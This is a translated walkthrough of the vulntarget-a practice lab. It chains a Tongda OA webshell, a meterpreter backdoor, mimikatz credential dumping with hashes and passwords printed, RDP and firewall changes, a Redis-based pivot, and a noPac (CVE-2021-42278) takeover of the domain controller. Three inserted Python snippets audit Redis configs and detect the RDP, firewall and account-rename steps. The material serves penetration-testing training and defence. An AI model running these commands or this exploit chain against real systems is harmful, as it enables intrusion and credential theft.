【vulntarget】Series: vulntarget-a Practice Walkthrough (WP)

Follow the WeChat account 【小白SEC】 for more content……


This article is only for learning 【vulntarget】; everything was tested and verified in a local environment for no other purpose. Do not perform unauthorized testing.

I. Lab information:

Download:

Baidu Cloud:
Link: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
Extraction code: s4ka

**Topology:** (diagram omitted) the IP addresses depend on the locally built environment and should be adjusted accordingly.

Official WP: vulntarget Vulnerability Lab Series (1)

II. Tools, vulnerabilities and techniques used:

Tools:
Viper、OA-EXPTOOL、Proxifier、nmap、noPac、RedisEXP、frp
Vulnerabilities or techniques:
Tongda OA historical vulnerabilities, Redis unauthorized access, CVE-2021-42278

III. Steps:

  1. Use a port scanner to find the target's IP address and open ports

(screenshot omitted)

  2. The web application turns out to be Tongda OA; scan it for historical vulnerabilities:

Tool used here: OA-EXPTOOL

(screenshots omitted)

  3. Use the tool directly: after obtaining a cookie, upload a WebShell with the tool:

(screenshot omitted)

  4. The webshell upload succeeds; connect to it with AntSword (蚁剑):

(screenshot omitted)

  5. Start Viper, create a listener and generate the backdoor program:

(screenshots omitted)

  6. Upload the downloaded backdoor to the win7 target through AntSword and execute it:

(screenshot omitted)

  7. Check Viper: win7 is online:

(screenshot omitted)

  8. The session already runs as SYSTEM, so no privilege escalation is needed; add routes with a command or through the tool:

Command to add routes automatically:

meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth vc6.

(screenshot omitted)
Or add the routes directly through Viper:
(screenshots omitted)

  9. Use kiwi to obtain plaintext credentials:
meterpreter > load kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
win7      win7-PC  f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
WIN7-PC$  WORKGROUP  (null)
win7      win7-PC    admin

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
win7      win7-PC  admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
win7      win7-PC    admin
win7-pc$  WORKGROUP  (null)

(screenshot omitted)

  10. Enable 3389 remote desktop:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

(screenshot omitted)

  11. Use Viper to scan the internal subnet and probe its ports:

(screenshot omitted)

  12. The scan shows that ports 80 and 6379 are open on the internal host 10.0.20.99

(screenshot omitted)

  13. Start a SOCKS proxy with Viper:

(screenshots omitted)

  14. Set up a SOCKS5 proxy with frp (look up the details yourself):

(screenshot omitted)

  15. Directory scanning reveals a phpinfo page:

(screenshot omitted)

  16. Determine the absolute web root path from phpinfo:

(screenshot omitted)

  17. Try to upload a webshell through the Redis unauthorized-access vulnerability:

(screenshot omitted)
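A defender's counterpart to step 17, added here as an example (not code from the WP): a small audit of a redis.conf that reports the settings which let an unauthenticated client on 6379 write files, with a constructed weak configuration beside a hardened one (the requirepass value is a placeholder).

```python
"""Audit a redis.conf for the settings that let an unauthenticated client on
6379 write files, the weakness step 17 relies on against 10.0.20.99.
Added example, not code from the WP; both config samples are constructed."""

# Constructed sample of an exposed, default-style instance
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed hardened counterpart (the requirepass value is a placeholder)
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

def parse_redis_conf(text):
    """Return (directives, renamed). Redis keeps the last value of a repeated
    directive; rename-command may legitimately repeat, so it is kept apart."""
    directives, renamed = {}, set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0].lower() == "rename-command" and len(parts) >= 3:
            renamed.add(parts[1].upper())
        else:
            directives[parts[0].lower()] = parts[1:]
    return directives, renamed

def audit_redis_conf(text):
    """Return finding codes in a fixed order; an empty list means none found."""
    d, renamed = parse_redis_conf(text)
    findings = []
    binds = d.get("bind") or ["0.0.0.0"]               # no bind line = every interface
    if any(a in ("0.0.0.0", "*", "::") for a in binds):
        findings.append("BIND_ALL_INTERFACES")
    if (d.get("protected-mode") or ["yes"])[0].lower() == "no":
        findings.append("PROTECTED_MODE_OFF")
    if not d.get("requirepass") or d["requirepass"][0].strip('"') == "":
        findings.append("NO_REQUIREPASS")
    if "CONFIG" not in renamed:   # rename-command CONFIG "" blocks runtime changes of dir/dbfilename
        findings.append("CONFIG_COMMAND_EXPOSED")
    return findings
```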

  18. Add the proxy in AntSword and connect to the webshell:

(screenshots omitted)

  19. Start a listener in Viper so the new session comes back through Win7; configure it as follows:

Because the new session has to be forwarded through the Win7 session, the following configuration is required; the same setting is needed when working directly in msfconsole:
(screenshots omitted)
The msfconsole configuration is as follows:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/me
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 10.0.20.98
LHOST => 10.0.20.98
msf6 exploit(multi/handler) > set LPORT 1115
LPORT => 1115
msf6 exploit(multi/handler) > set REVERSELISTENERCOMM 1
REVERSELISTENERCOMM => 1
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------



Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.20.98       yes       The listen address (an interface may be specified)
   LPORT     1115             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.20.98:1115 via the meterpreter on session 1

(screenshot omitted)

  20. Generate a backdoor, upload it to the internal win2016 machine through AntSword and execute it:

(screenshot omitted)

  21. Back in Viper, win2016 is online:

Note: if it does not come online, turn off the win7 firewall.

(screenshot omitted)

  22. Escalate privileges on win2016 and collect account and domain information:

Privilege escalation: here getsystem works directly, but that is not guaranteed in other environments; other escalation methods will be covered later:

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                         Connection
  --  ----  ----                     -----------                         ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN7-PC       192.168.0.103:1111 -> 192.168.0.104:54972 (192.168.0.104)
  2         meterpreter x64/windows  VULNTARGET\Administrator @ WIN2016  10.0.20.99:1115 -> 10.0.20.99:49947 via session 1 (10.0.20.99)

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

(screenshot omitted)
Collecting account information: kiwi is used here, and it yields the plaintext password Administrator : Admin@666. Cracking the NTLM hash of win2016 also recovers the plaintext.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain      NTLM                              SHA1                                      DPAPI
--------       ------      ----                              ----                                      -----
Administrator  VULNTARGET  c7c654da31ce51cbeecfef99e637be15  20045722851488e55f32110eb0a5222ba793fe2f  4df31630e621c2278c303c0940d878ff
WIN2016$       VULNTARGET  e0cd419213811fd910ca6c3c42d764e7  cd721f807e68ce07a4d0fe80b9356e93986d5ef1
WIN2016$       VULNTARGET  205578b8183da2b5d54f1d52187a2dc4  f453223f7f6a2e82740874f658c1eb267aeb836c
win2016        VULNTARGET  dfc8d2bfa540a0a6e2248a82322e654e  cfa10f59337120a5ea6882b11c1c9f451f5f4ea6  27bd7cc4802079a6e008ed2d917c4323

wdigest credentials
===================

Username       Domain      Password
--------       ------      --------
(null)         (null)      (null)
Administrator  VULNTARGET  (null)
WIN2016$       VULNTARGET  (null)
win2016        VULNTARGET  (null)

kerberos credentials
====================

Username       Domain          Password
--------       ------          --------
(null)         (null)          (null)
Administrator  VULNTARGET.COM  Admin@666
Administrator  VULNTARGET.COM  (null)
WIN2016$       vulntarget.com  NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$       vulntarget.com  45 1a cd e0 7b ae fd cf 39 33 3a 67 c2 db b4 9e 42 1e 15 2c 24 d3 37 d9 8e 0c 77 9f af e1 3f ae 4b 72 b7 2e 0b fe f6 ad 7a 52 da e1 52 25 43 e6 11 28 6d ff 37 f0 91 54 dc df 75 6b 9c 18 8c 6d 05 83 0d ce 6c 18 c0 87 46 53 f2 d1 fd 46 e7 c1 f9 6f 8b e2 9e 0e 58 6f d2 d7 89 39 29 cc 31 bf 17 bd 38 23 97 be be 14 c6 0a 0f 7a 86 55 05 a6 80 07 dd f2 37 4d 1d c7 5b 69 bf 3b b7 69 6f 75 95 fc 98 fa 74 18 be 65 d3 35 48 eb 64 be 4c 14 69 02 53 55 8d cb 59 6c a0 2d 9b 68 a8 2c 39 c1 63 f5 74 c7 90 86 67 35 06 bc 91 21 96 c0 fa 5c 9b a0 2d 72 8c b9 96 91 ff 09 dd dc ce 71 14 63 12 72 5a 5b eb c8 cc 07 a4 b4 d5 e2 d9 af 21 87 4f 60 3c 88 dc d8 a1 57 14 d7 59 52 d9 67 aa 7f 9a 96 76 56 50 f1 4b 92 a3 56 a3 12 cb 7e 12 7e
win2016        VULNTARGET.COM  (null)
win2016$       VULNTARGET.COM  (null)

(screenshots omitted)
Collecting domain information: run post/windows/gather/enum_domain

meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)

(screenshot omitted)

  23. Turn off the win2016 firewall
meterpreter > shell
Process 4680 created.
Channel 1 created.
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

C:\Windows\system32>netsh Firewall show state
netsh Firewall show state

防火墙状态:
-------------------------------------------------------------------
配置文件                          = 标准
操作模式                          = 启用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 禁用
组策略版本                        = Windows 防火墙
远程管理模式                      = 禁用

所有网络接口上的端口当前均为打开状态:
端口   协议  版本  程序
-------------------------------------------------------------------
80     TCP       任何       (null)

重要信息: 已成功执行命令。
但不赞成使用 "netsh firewall";
而应该使用 "netsh advfirewall firewall"。
有关使用 "netsh advfirewall firewall" 命令
而非 "netsh firewall" 的详细信息,请参阅
http://go.microsoft.com/fwlink/?linkid=121488
上的 KB 文章 947709

C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
确定。


C:\Windows\system32>

(screenshot omitted)
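The commands in steps 10 and 23 appear verbatim in process-creation telemetry (Windows Security Event 4688 or Sysmon Event 1), so they are straightforward to alert on. The detection logic below is an added example, not part of the WP; the event records are constructed from the commands shown above plus two benign read-only look-alikes.

```python
"""Flag the commands used in steps 10 and 23 (enabling RDP, disabling NLA,
opening 3389, switching off the host firewall) in process-creation telemetry.
Added example, not part of the WP; the records below are constructed."""
import re

# rule name -> pattern applied to a whitespace-normalised command line
RULES = {
    "HOST_FIREWALL_DISABLED":
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off",
    "RDP_NLA_DISABLED":   # UserAuthentication=0 turns off Network Level Authentication
        r"reg\s+add\s+.*WinStations\\RDP-Tcp.*UserAuthentication.*/d\s+0\b",
    "RDP_ENABLED_VIA_WMIC":
        r"wmic\s+RDTOGGLE\s+.*SetAllowTSConnections\s+1\b",
    "RDP_FIREWALL_RULE_ADDED":
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule\s+.*localport=3389.*action=allow",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in RULES.items()}

RDP_KEY = r"HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

# Constructed 4688-style records: the lab's commands plus two benign look-alikes
EVENTS = [
    {"host": "WIN7-PC", "cmd": f'reg add "{RDP_KEY}" /t REG_DWORD /v portnumber /d 3389 /f'},
    {"host": "WIN7-PC", "cmd": "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"},
    {"host": "WIN7-PC", "cmd": 'netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow'},
    {"host": "WIN7-PC", "cmd": f'reg add "{RDP_KEY}" /v UserAuthentication /t REG_DWORD /d 0 /f'},
    {"host": "WIN2016", "cmd": "netsh advfirewall set allprofiles state off"},
    {"host": "WIN2016", "cmd": "netsh advfirewall show allprofiles state"},      # benign: read-only
    {"host": "WIN7-PC", "cmd": f'reg query "{RDP_KEY}" /v UserAuthentication'},  # benign: read-only
]

def detect(events):
    """Return (host, rule) pairs, in event order, for every command that matches a rule."""
    hits = []
    for ev in events:
        cmd = " ".join(ev["cmd"].split())   # collapse whitespace so the \s+ patterns are stable
        for name, rx in COMPILED.items():
            if rx.search(cmd):
                hits.append((ev["host"], name))
    return hits

def hosts_with_rdp_opened(events):
    """Hosts where RDP was both switched on and exposed through the firewall (the step-10 combination)."""
    by_host = {}
    for host, rule in detect(events):
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, r in by_host.items()
                  if "RDP_ENABLED_VIA_WMIC" in r and "RDP_FIREWALL_RULE_ADDED" in r)

if __name__ == "__main__":
    for host, rule in detect(EVENTS):
        print(f"{host}: {rule}")
```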

  24. The official write-up attacks by blanking the domain password; here noPac is used instead:

See the earlier article: [Domain privilege escalation: reproducing CVE-2021-42278]
Domain information:
**Domain host:** VULNTARGET 10.0.10.110
**Domain name:** vulntarget.com
**Domain user:** win2016 **Password:** Admin#123

  25. Add routes for all sessions, then start the SOCKS proxy

(screenshot omitted)

  26. With the SOCKS proxy configured on kali, run noPac; the domain controller is successfully taken over:
┌──(root)-[/noPac]
└─# proxychains4 python noPac.py -use-ldap vulntarget.com/win2016:'Admin#123' -dc-ip 10.0.10.110 -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████

[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:389  ...  OK
[*] Current ms-DS-MachineAccountQuota = 10
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:53  ...  OK
[*] Selected Target win2019.vulntarget.com
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-UWMIKQB3SXN$"
[*] MachineAccount "WIN-UWMIKQB3SXN$" password = n^u!WN@68kLw
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:445  ...  OK
[*] Successfully added machine account WIN-UWMIKQB3SXN$ with password n^u!WN@68kLw.
[*] WIN-UWMIKQB3SXN$ object = CN=WIN-UWMIKQB3SXN,CN=Computers,DC=vulntarget,DC=com
[*] WIN-UWMIKQB3SXN$ sAMAccountName == win2019
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:88  ...  OK
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:88  ...  OK
[*] Saving a DC's ticket in win2019.ccache
[*] Reseting the machine account to WIN-UWMIKQB3SXN$
[*] Restored WIN-UWMIKQB3SXN$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:88  ...  OK
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_win2019.vulntarget.com.ccache
[*] Attempting to del a computer with the name: WIN-UWMIKQB3SXN$
[-] Delete computer WIN-UWMIKQB3SXN$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[proxychains] Strict chain  ...  192.168.0.103:1116  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig

Windows IP 配置


以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::fd46:b12f:5694:3873%4
   IPv4 地址 . . . . . . . . . . . . : 10.0.10.110
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

(screenshot omitted)
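What the run above leaves in the domain controller's Security log is a computer-account creation (Event 4741) followed by a rename to the DC's name without the trailing "$" (Event 4781) and a rename back. The detection below is an added example, not code from the WP or from noPac; the records are constructed, DC_ACCOUNTS is taken from the enum_domain output, and TRUSTED_JOINERS is an assumed allow-list.

```python
"""Detection for the sAMAccountName spoofing step (CVE-2021-42278, run with
noPac above) from the domain controller's audit log: Event 4741 (computer
account created) and Event 4781 (account renamed).
Added example, not from the WP; the records and timestamps are constructed."""

DC_ACCOUNTS = {"WIN2019$"}           # from the enum_domain output: win2019.vulntarget.com is the DC
TRUSTED_JOINERS = {"Administrator"}  # assumption: accounts allowed to create computer objects

# Constructed records mirroring what the noPac output reports doing
EVENTS = [
    {"id": 4741, "time": "2022-01-10T10:00:01", "subject": "win2016",
     "target": "WIN-UWMIKQB3SXN$"},
    {"id": 4781, "time": "2022-01-10T10:00:02", "subject": "win2016",
     "old": "WIN-UWMIKQB3SXN$", "new": "win2019"},
    {"id": 4781, "time": "2022-01-10T10:00:05", "subject": "win2016",
     "old": "win2019", "new": "WIN-UWMIKQB3SXN$"},
    {"id": 4781, "time": "2022-01-10T11:30:00", "subject": "Administrator",
     "old": "HR-PC01$", "new": "HR-PC02$"},   # benign rename, for contrast
]

def is_computer_name(name):
    """Computer sAMAccountNames end in '$'; dropping it is the core of the spoof."""
    return name.endswith("$")

def detect_samaccountname_spoof(events, dc_accounts=DC_ACCOUNTS, trusted=TRUSTED_JOINERS):
    """Return (rule, old_or_creator, new_or_created) tuples in time order."""
    dc_upper = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4741 and ev["subject"] not in trusted:
            # Ordinary users can do this while ms-DS-MachineAccountQuota > 0 (10 in the lab); set it to 0
            alerts.append(("MACHINE_ACCOUNT_CREATED_BY_USER", ev["subject"], ev["target"]))
        elif ev["id"] == 4781:
            old, new = ev["old"], ev["new"]
            if is_computer_name(old) and not is_computer_name(new):
                alerts.append(("COMPUTER_RENAMED_WITHOUT_DOLLAR", old, new))
            if new.upper().rstrip("$") + "$" in dc_upper:   # new name collides with a DC's account
                alerts.append(("RENAME_COLLIDES_WITH_DC", old, new))
    return alerts

if __name__ == "__main__":
    for alert in detect_samaccountname_spoof(EVENTS):
        print(alert)
```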

  27. Full attack-chain diagram:

(screenshots omitted)

Lab walkthroughs will continue to be updated……
